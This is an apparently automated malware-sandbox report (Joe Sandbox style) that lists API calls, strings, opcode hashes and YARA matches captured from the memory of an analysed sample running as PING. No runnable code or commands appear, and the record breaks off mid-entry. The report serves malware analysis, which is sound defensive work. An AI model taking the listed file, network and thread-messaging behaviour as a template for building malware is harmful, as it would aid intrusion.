                                                      • Instruction ID: 1ab7b0abf898c45c4391d894fbae9c28c0a0fcd5ce1f8eef1633a6a15674b235
                                                      • Opcode Fuzzy Hash: 271e477dc3f40e7bb517306d9b976ff0acf75f59f3d7e981f6f1ce304b6dccfd
                                                      • Instruction Fuzzy Hash: 171106B2900218ABEB14CF98D8C1EDEF7B9FF44304F14820DE8196B245E771A948CBA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$k$o
                                                      • API String ID: 0-3624523832
                                                      • Opcode ID: ab9fc62c3d397ce8b14ed7da0bf9d4c2f1d758f269f53f755fc03860c9576517
                                                      • Instruction ID: cdd785060138ff6361128446668721708c1498d1c7c54ed354713a080f9eb18e
                                                      • Opcode Fuzzy Hash: ab9fc62c3d397ce8b14ed7da0bf9d4c2f1d758f269f53f755fc03860c9576517
                                                      • Instruction Fuzzy Hash: 190104B290021CABDB14DF99D8C5ADEF7B9FF08304F048219E9099B201E771A544CBA0

                                                      Execution Graph

                                                      Execution Coverage:2.7%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:1.7%
                                                      Total number of Nodes:418
                                                      Total number of Limit Nodes:64
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 0309BEF4
                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 0309BF2F
                                                      • FindClose.KERNELBASE(?), ref: 0309BF3A
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: bd9c2be3583d3bf749113f70bf2a133959825a791ae526caeccdbd2650c201ba
                                                      • Instruction ID: b9707290edade07cac262183c3a86d9f539d830b4cf900b4c7fe6cb5bd0a054c
                                                      • Opcode Fuzzy Hash: bd9c2be3583d3bf749113f70bf2a133959825a791ae526caeccdbd2650c201ba
                                                      • Instruction Fuzzy Hash: A731B475501348BBEB60EFA4DC84FFF77BCEF84754F144459B948AB180DA70AA849BA0
                                                      APIs
                                                      • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 030A7E06
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: c68e728ad39377c440db94a4305d40df19ea38251ebc9d98e5bffa51801b772c
                                                      • Instruction ID: 66b12d6a1b347697b50316aacfdcca512707bd5a8cededdce58ff304380df42a
                                                      • Opcode Fuzzy Hash: c68e728ad39377c440db94a4305d40df19ea38251ebc9d98e5bffa51801b772c
                                                      • Instruction Fuzzy Hash: 0C31C0B5A01609AFCB14DF98D880EEFB7F9AF8C314F108219F918A7340D770A951CBA5
                                                      APIs
                                                      • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 030A7F4B
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 1465728481726c9bb084e5323f0b8c86563e54366064e15e4f0de43792759f49
                                                      • Instruction ID: 7f2480f62ad55309f24c8f7fabcfa42bd0ef2ae6ba1708cabd3790689f8651f2
                                                      • Opcode Fuzzy Hash: 1465728481726c9bb084e5323f0b8c86563e54366064e15e4f0de43792759f49
                                                      • Instruction Fuzzy Hash: 4B31D1B5A01609AFCB14DF98D880EEAB7B9EF8C314F148209F918A7240D771A911CBA5
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: 854604fafdd28f89a9129c512f9f3f7df6f50225bcbb5afc650f1508cc539b29
                                                      • Instruction ID: 800ad0329fc4d259c7d25f19708c4bf2d2c3e89819f9c49e4f6ecf2135744ce2
                                                      • Opcode Fuzzy Hash: 854604fafdd28f89a9129c512f9f3f7df6f50225bcbb5afc650f1508cc539b29
                                                      • Instruction Fuzzy Hash: EF015E36A427087FD614EAA8DC41FEB77ACDF85710F444409FA58AB280D7717910C7E5
                                                      APIs
                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 030A8034
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: aea83c43bb45f9675bbdc70e8d614500eeda45f9b577eecd5c5434082f95c6a5
                                                      • Instruction ID: a8333f2c1f5a66a75600c753b9259baf14186fe1743cd9d799df56a88301634b
                                                      • Opcode Fuzzy Hash: aea83c43bb45f9675bbdc70e8d614500eeda45f9b577eecd5c5434082f95c6a5
                                                      • Instruction Fuzzy Hash: D8E04F356407147BD210EB59DC40FDB776CDFC5760F008415FA0CAB241C671791186F4
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7a0dc1a5a40afbafdfbe41607640b553e6daf10ac0b8d65b59b05e0f2d67432f
                                                      • Instruction ID: 19e5261c85b1486048b72f5b89aa785ad2cd13cca9127b93551e36e6c1d2ec4d
                                                      • Opcode Fuzzy Hash: 7a0dc1a5a40afbafdfbe41607640b553e6daf10ac0b8d65b59b05e0f2d67432f
                                                      • Instruction Fuzzy Hash: 5B90023160580516A540B1984C84546404597E1301B69C052E142C554C8B148A5A5366
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 16b06453236523829cb72476ee73f563d92398dcb1d0674221cdb2d6c36383a8
                                                      • Instruction ID: 68dcae721359c8d42365ee171a57110785b7b8c885c5f8566701410145e8a8ce
                                                      • Opcode Fuzzy Hash: 16b06453236523829cb72476ee73f563d92398dcb1d0674221cdb2d6c36383a8
                                                      • Instruction Fuzzy Hash: 53900261601505465540B1984C04406604597E23013A9C156A155C560C87188959926E
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 0f72b877df92c334950a766a7d2b586098a00bd2818bca801d1b7b0e23eea65e
                                                      • Instruction ID: baa79bc5b7c5770eb664656ea98c7fec717879cf6c717446465393485ae928d8
                                                      • Opcode Fuzzy Hash: 0f72b877df92c334950a766a7d2b586098a00bd2818bca801d1b7b0e23eea65e
                                                      • Instruction Fuzzy Hash: CE90023160550906E500B1984914706104587D1201F79C452A142C568D87958A5565A7
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6572daf371c8a581818912f29e26fc3f166ea18de8b1efab417407c2d88ae179
                                                      • Instruction ID: b3e4fffde6fe7b85938b00e2acfb43f89456ebaaa423749f4c3747a901bcb5a8
                                                      • Opcode Fuzzy Hash: 6572daf371c8a581818912f29e26fc3f166ea18de8b1efab417407c2d88ae179
                                                      • Instruction Fuzzy Hash: 68900261202405075505B1984814616404A87E1201B69C062E201C590DC6258995612A
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 41a4f14a0a6cba0e8f3e72bcef84f3fe47809a11dc0e96c4d7e8f74a3fc78bad
                                                      • Instruction ID: 2bb7818f778170ea65a4c91ab18bdecd34d9e9fb78ebf7c8f704f60232c07261
                                                      • Opcode Fuzzy Hash: 41a4f14a0a6cba0e8f3e72bcef84f3fe47809a11dc0e96c4d7e8f74a3fc78bad
                                                      • Instruction Fuzzy Hash: C5900225211405071505F5980B04507008687D6351369C062F201D550CD72189655126
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 1fd6382ff58139d08e100d33c273d542eab42be5f3fcb1b004fc772ef918e2cd
                                                      • Instruction ID: 1dc2a3e11e818c6d3e8fa83d7cff075e60942350a2877ae9e8db76c750e66116
                                                      • Opcode Fuzzy Hash: 1fd6382ff58139d08e100d33c273d542eab42be5f3fcb1b004fc772ef918e2cd
                                                      • Instruction Fuzzy Hash: 7E900225221405061545F5980A0450B048597D73513A9C056F241E590CC72189695326
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3168f0e86fbb8659e062615fc6995fb56b4080fff3845c9f9200fa7b48118cb4
                                                      • Instruction ID: a0e5d43cfc192d0dd3dfd40b9db4986f3a152a79605ddc073c0d0e43e46e4548
                                                      • Opcode Fuzzy Hash: 3168f0e86fbb8659e062615fc6995fb56b4080fff3845c9f9200fa7b48118cb4
                                                      • Instruction Fuzzy Hash: 5890022124545606E550B19C48046164045A7E1201F69C062A181C594D865589596226
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 91cbe970b04e600f3af488c5c73f8359cfcae571d54e4ba0b7b7b4e461b84e4a
                                                      • Instruction ID: 467ca5885a89a06e8346f93c23856995ca410db7e280617de4eef8bc9b732469
                                                      • Opcode Fuzzy Hash: 91cbe970b04e600f3af488c5c73f8359cfcae571d54e4ba0b7b7b4e461b84e4a
                                                      • Instruction Fuzzy Hash: D4900221601405465540B1A88C449064045ABE2211769C162A199C550D86598969566A
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 696a59f6e2c23fb5e116a89a41040b361159956570e35c45b67088c09c037516
                                                      • Instruction ID: 98754e57e6339d1c8da3feab59ad5b51798fd94bd5aff491a68c0ea8d89bd608
                                                      • Opcode Fuzzy Hash: 696a59f6e2c23fb5e116a89a41040b361159956570e35c45b67088c09c037516
                                                      • Instruction Fuzzy Hash: 3A900221211C0546E600B5A84C14B07004587D1303F69C156A115C554CCA1589655526
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 531830c3860c65a657c053a96dbe2c03dc243e157906b40d42d742c41dc639be
                                                      • Instruction ID: 9a5e7ae54196efca4ca7e01967d398c9cb77d83cc081dd5bdd903a8db43987df
                                                      • Opcode Fuzzy Hash: 531830c3860c65a657c053a96dbe2c03dc243e157906b40d42d742c41dc639be
                                                      • Instruction Fuzzy Hash: 7790026134140946E500B1984814B060045C7E2301F69C056E206C554D8719CD56612B
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 961dc917b2907a7bd6fda115354c4c27e4b7eb5bb4be23d397d3c1f091ef44e4
                                                      • Instruction ID: 23055a8cca7b272c63115f860326fea2f4c57a42d0ac551e1039d729cebeacdd
                                                      • Opcode Fuzzy Hash: 961dc917b2907a7bd6fda115354c4c27e4b7eb5bb4be23d397d3c1f091ef44e4
                                                      • Instruction Fuzzy Hash: 6A90026120180907E540B5984C04607004587D1302F69C052A306C555E8B298D55613A
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 505dafe03cbc5d972301e88ba4a53c9c27b4e8daa9cd717bd93ec497063e5774
                                                      • Instruction ID: b8e8dd9e8575d6a8236c11732db6df36f8628a343ae4da8f5e3a2ee3bf9fb237
                                                      • Opcode Fuzzy Hash: 505dafe03cbc5d972301e88ba4a53c9c27b4e8daa9cd717bd93ec497063e5774
                                                      • Instruction Fuzzy Hash: 35900221242446566945F1984804507404697E12417A9C053A241C950C8626995AD626

                                                      APIs
                                                      • WSAStartup.WS2_32(00000202,?), ref: 030918AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Startup
                                                      • String ID: n$n
                                                      • API String ID: 724789610-3874132673
                                                      • Opcode ID: 864ae63fd1b04445733242d9d2239697806cd385ddb5e7526365e03ca3a2d9a6
                                                      • Instruction ID: ce29681ecf0e23e93118e304e2b477a3897de109b61a7cfc0be8f664c9c8d351
                                                      • Opcode Fuzzy Hash: 864ae63fd1b04445733242d9d2239697806cd385ddb5e7526365e03ca3a2d9a6
                                                      • Instruction Fuzzy Hash: D8916E75E0230AABEF14DFA9DC40BEEF7F4AF84304F08416AE518AB280E7746545DB95

                                                      APIs
                                                      • WSAStartup.WS2_32(00000202,?), ref: 030918AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Startup
                                                      • String ID: n$n
                                                      • API String ID: 724789610-3874132673
                                                      • Opcode ID: 66eda3ba223267216c3584d54d487aacb19cf11e24d29ae0718b5a1bc38a6bfe
                                                      • Instruction ID: a04703b9c2f443960fe2178d4c3ee829284aa80ac491e19f947456ccc9cb6769
                                                      • Opcode Fuzzy Hash: 66eda3ba223267216c3584d54d487aacb19cf11e24d29ae0718b5a1bc38a6bfe
                                                      • Instruction Fuzzy Hash: 5D915E75E0230AAAEF14DFA4DC40BEEFBF4BF44304F08416AE518AB280E7746645DB95

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: y870G2JOQ$y870G2JOQ
                                                      • API String ID: 0-340756553
                                                      • Opcode ID: 301362c7bffaf120ec22be39ef473cf97d063a67ee710c56270974ecc65845ad
                                                      • Instruction ID: 6316baab5c6431d7e029839ab2bc8619bb1f80ad9757a210da02a44241553073
                                                      • Opcode Fuzzy Hash: 301362c7bffaf120ec22be39ef473cf97d063a67ee710c56270974ecc65845ad
                                                      • Instruction Fuzzy Hash: BC31BD36D1628579EF11DBA48C02FEEBFB8AF82B54F184195E4906F282E371810BD791

                                                      APIs
                                                      • PostThreadMessageW.USER32(y870G2JOQ,00000111,00000000,00000000), ref: 03090AED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: y870G2JOQ$y870G2JOQ
                                                      • API String ID: 1836367815-340756553
                                                      • Opcode ID: adb99a747ee0173144351944a3aea06e0caa808d67b3353b1515557d49777c68
                                                      • Instruction ID: 011760a9fff12db20668ca1674713b8504582f3fa962db36eb6025c29663a118
                                                      • Opcode Fuzzy Hash: adb99a747ee0173144351944a3aea06e0caa808d67b3353b1515557d49777c68
                                                      • Instruction Fuzzy Hash: AC11E135D422187AEB10D7D49C02FDFBBBC9F81B54F048055FA107F181D6B896068BE5
                                                      APIs
                                                      • PostThreadMessageW.USER32(y870G2JOQ,00000111,00000000,00000000), ref: 03090AED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: y870G2JOQ$y870G2JOQ
                                                      • API String ID: 1836367815-340756553
                                                      • Opcode ID: a19ed30b372ccc3978bf95177a500fb0141124a91b4e8ac7ac76e96e21972863
                                                      • Instruction ID: fd825d5cc0df19a16bb411b17f2af4317c80b189c4698b803b6c90845da08112
                                                      • Opcode Fuzzy Hash: a19ed30b372ccc3978bf95177a500fb0141124a91b4e8ac7ac76e96e21972863
                                                      • Instruction Fuzzy Hash: 3201A135D4231876EB10E6E49C02FDFBBBC9F80B54F048055FA147B180D6B4A60687E5
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 030A2C0B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      • Opcode ID: b971afcb3b89c605de9ed16204a7664e381b6f7793a855666e67b2e923255485
                                                      • Instruction ID: c7bb1cca21837dd7343beaeedefa1a6f7d1671e211fc0e9cbae817e8f8e2ba32
                                                      • Opcode Fuzzy Hash: b971afcb3b89c605de9ed16204a7664e381b6f7793a855666e67b2e923255485
                                                      • Instruction Fuzzy Hash: 1031AFB5602704BBD718DFA5D880FE7BBACFB88704F00862DAA5D5B245D770B644CBA4
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 0309EBD7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID: @J7<
                                                      • API String ID: 2538663250-2016760708
                                                      • Opcode ID: 65ce5571bb56d23527fffbb061ed3477e7383b67b672a4a08ca559f876bcf21e
                                                      • Instruction ID: 7572d89ace6d0b4352da2fa6fd7d073d07fb7622d6cf8a9d734e257f3245f939
                                                      • Opcode Fuzzy Hash: 65ce5571bb56d23527fffbb061ed3477e7383b67b672a4a08ca559f876bcf21e
                                                      • Instruction Fuzzy Hash: 68314FB6A00609EFDF00DFD8D8809EEB7B9FF88304B148559E505AB254D775AE05CBA1
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 0309EBD7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID: @J7<
                                                      • API String ID: 2538663250-2016760708
                                                      • Opcode ID: 28f74375f10a066a86184a4012e5dd8ca27dcc73e77849bdc73188b64a37b19d
                                                      • Instruction ID: 62f51a22805692eacd145e92ca6c88af1186f15d035ebcc3c60daacf0dabf280
                                                      • Opcode Fuzzy Hash: 28f74375f10a066a86184a4012e5dd8ca27dcc73e77849bdc73188b64a37b19d
                                                      • Instruction Fuzzy Hash: 1E312DB6A0060AAFDF00DFD8D8809EEB7B9BF88304B148559E515AB254D775EE05CBA0
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?), ref: 03097D4C
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 150430a16d506f708fce41dfff296d796d73cb163f1e46f6867a1b050da2145f
                                                      • Instruction ID: e7786b79ad8484bfcc0e1908affd3798d9a1c41788168af900b5e81847871153
                                                      • Opcode Fuzzy Hash: 150430a16d506f708fce41dfff296d796d73cb163f1e46f6867a1b050da2145f
                                                      • Instruction Fuzzy Hash: 3E21BB326263009FEB24DEB8DC413F1FBF49F55E20F08426ED4A84B186D631844AE690
                                                      APIs
                                                      • WSAStartup.WS2_32(00000202,?), ref: 030918AD
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Startup
                                                      • String ID:
                                                      • API String ID: 724789610-0
                                                      • Opcode ID: 5f9345cbed8a27ee8afd49a1a69134a08e40f7e2a07e9e25ae462c66cb8e88de
                                                      • Instruction ID: eb89776281f953029f03e74943cce948f2e1cf3d8828408a711f53f4a4b050b8
                                                      • Opcode Fuzzy Hash: 5f9345cbed8a27ee8afd49a1a69134a08e40f7e2a07e9e25ae462c66cb8e88de
